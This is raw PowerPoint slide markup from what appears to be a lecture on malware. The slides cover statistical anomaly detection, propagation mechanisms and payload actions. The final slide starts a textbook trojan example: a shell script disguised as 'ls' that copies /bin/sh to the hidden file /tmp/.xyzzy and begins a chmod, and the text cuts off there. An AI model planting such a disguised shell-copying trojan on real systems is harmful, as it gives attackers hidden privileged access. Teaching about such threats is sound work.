                        <a:t>If di</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-50" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f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ferent,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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e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rror occurred</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>46</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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177355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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Detecting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Statistical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-100" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Anomalies</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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541655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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Example: application had 3 programmers working on it, but statistical analysis shows code from a fourth person—may be from a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-5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700" spc="-100" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>rojan horse or virus.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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50"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="817245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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Other attributes: more conditionals than in original; look for identical sequences of bytes not common to any library routine; increases in file size, frequency of writing to executables, etc.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>47</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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489703" y="2563367"/>
            <a:ext cx="858012" cy="835152"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="858012" h="835152">
                <a:moveTo>
                  <a:pt x="858011" y="213360"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="821435" y="92964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774953" y="27432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="689609" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="606551" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504443" y="55626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419861" y="157734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336041" y="240792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261365" y="352044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214883" y="464058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27431" y="473202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="528828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27431" y="556260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204977" y="548640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204977" y="723168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233933" y="807720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280415" y="835152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382523" y="816102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504443" y="760476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616457" y="677418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718565" y="585216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811529" y="454152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848105" y="342900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="858011" y="213360"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="858012" h="835152">
                <a:moveTo>
                  <a:pt x="204977" y="723168"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="204977" y="548640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195833" y="696468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204977" y="72316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443984" y="3442715"/>
            <a:ext cx="595121" cy="1226820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="595121" h="1226820">
                <a:moveTo>
                  <a:pt x="595121" y="223266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="595121" y="150114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575309" y="94488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492251" y="19812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380237" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250697" y="28956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167639" y="103632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112013" y="214122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55625" y="390906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="567690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="734568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="919734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73151" y="1040892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157733" y="1179576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241553" y="1226820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353567" y="1226820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445769" y="1217676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="1211572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="640842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465581" y="531114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492251" y="400050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557783" y="288798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595121" y="223266"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="595121" h="1226820">
                <a:moveTo>
                  <a:pt x="585216" y="985266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="557783" y="873252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483107" y="762000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="640842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455675" y="1211572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521207" y="1171194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575310" y="1086612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585216" y="98526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918709" y="3483102"/>
            <a:ext cx="660653" cy="1104138"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="660653" h="1104138">
                <a:moveTo>
                  <a:pt x="660654" y="685037"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="651510" y="638555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361950" y="323087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="45719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110489" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="7619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="54101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8382" y="109727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54864" y="194309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305562" y="425195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436626" y="555497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520445" y="630935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="657605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="749807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622554" y="713231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660654" y="685037"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="660653" h="1104138">
                <a:moveTo>
                  <a:pt x="529590" y="749807"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="529590" y="657605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502920" y="685037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="704087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334518" y="723137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241554" y="723137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156972" y="732281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100584" y="749807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64008" y="796289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64008" y="861821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120396" y="946404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="992885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="834389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185928" y="796289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241554" y="788669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="778763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529590" y="749807"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="660653" h="1104138">
                <a:moveTo>
                  <a:pt x="446532" y="1075182"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="427482" y="1038605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334518" y="1009649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203454" y="898397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="834389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="992885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212598" y="1038605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324612" y="1104138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408432" y="1104138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446532" y="107518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136135" y="4456176"/>
            <a:ext cx="595121" cy="1383030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="595121" h="1383029">
                <a:moveTo>
                  <a:pt x="483869" y="1225296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="483869" y="1077468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465581" y="1114044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363473" y="1150620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139445" y="1206246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="1261872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1299972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102869" y="1383030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149351" y="1383030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261365" y="1308354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371855" y="1252728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="1225296"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="595121" h="1383029">
                <a:moveTo>
                  <a:pt x="576071" y="176784"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="558545" y="55625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529589" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409955" y="55626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400049" y="157734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409955" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427481" y="585216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="715518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="919734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483869" y="1225296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="1218946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="565404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558545" y="306324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576071" y="176784"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="595121" h="1383029">
                <a:moveTo>
                  <a:pt x="595121" y="1178814"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="595121" y="1058418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576071" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520445" y="677418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="565404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512063" y="1218946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568451" y="1206246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595121" y="11788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117085" y="2420111"/>
            <a:ext cx="977646" cy="1232915"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="977646" h="1232915">
                <a:moveTo>
                  <a:pt x="977646" y="83057"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="912114" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="827532" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724662" y="46481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660654" y="167639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576072" y="223265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446532" y="240791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212598" y="268985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27432" y="325373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="371093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17526" y="519683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83058" y="723137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="824821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="398525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297942" y="342899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="315467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651510" y="325373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678180" y="352043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707136" y="323562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707136" y="259841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734568" y="176783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810006" y="102107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865632" y="83057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939546" y="128777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977646" y="83057"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="977646" h="1232915">
                <a:moveTo>
                  <a:pt x="566166" y="1177289"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="548640" y="1094993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512064" y="982979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371094" y="852677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232410" y="733043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166878" y="601979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="398525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139446" y="824821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176022" y="890777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268986" y="1038605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353568" y="1140713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436626" y="1213865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520446" y="1232915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="566166" y="1177289"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="977646" h="1232915">
                <a:moveTo>
                  <a:pt x="724662" y="306323"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="707136" y="259841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707136" y="323562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724662" y="3063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412358" y="2475815"/>
            <a:ext cx="67945" cy="65153"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="67945" h="65153">
                <a:moveTo>
                  <a:pt x="67945" y="33450"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="65569" y="21295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58077" y="10243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46357" y="2736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31321" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18771" y="3399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8703" y="11484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2113" y="23768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4590" y="50425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13601" y="58811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27017" y="64021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44820" y="65153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56818" y="58132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64951" y="47112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67945" y="334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9" name="object 9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1703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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Questions</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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00600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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5357730"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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288540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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Propagation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Mechanisms</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1255395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Infection of existing content</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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by viruses that is subsequently spread to other systems</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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878840" marR="992505" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef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Exploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="15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of software vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="15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solidFill>
                            <a:srgbClr val="FF000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by worms or drive-by-downloads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to allow the malware</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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to replicate</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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878840" marR="820420" indent="-342900"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Social engineering</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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attacks that convince</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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users to bypass security mechanisms to install</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-4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-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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rojans or to respond to phishing attacks</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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00"/>
                        </a:spcBef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“Spear phishing”</a:t>
                      </a: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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a: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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Payload</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-110" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Actions</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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Corruption of system or data files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 panose="020B0604020202020204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Reversible</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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encryption of data files.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="651510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Theft of service (make the system a zombie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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agent part of a botnet)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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="601345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Theft of information</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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from the system, such as key logging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 panose="020B0604020202020204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Hiding its presence on the system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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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R="0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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Example</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1107440" marR="462915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11074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Place the script below in an executable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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file called “ls” and trick someone into executing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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it.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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440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11074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The shell script for a UNIX system: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1221740" marR="3335020">
                        <a:lnSpc>
                          <a:spcPts val="3460"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="25"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>c</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>/bin/s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>h</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>tmp/.xyzzy chmo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:solidFill>
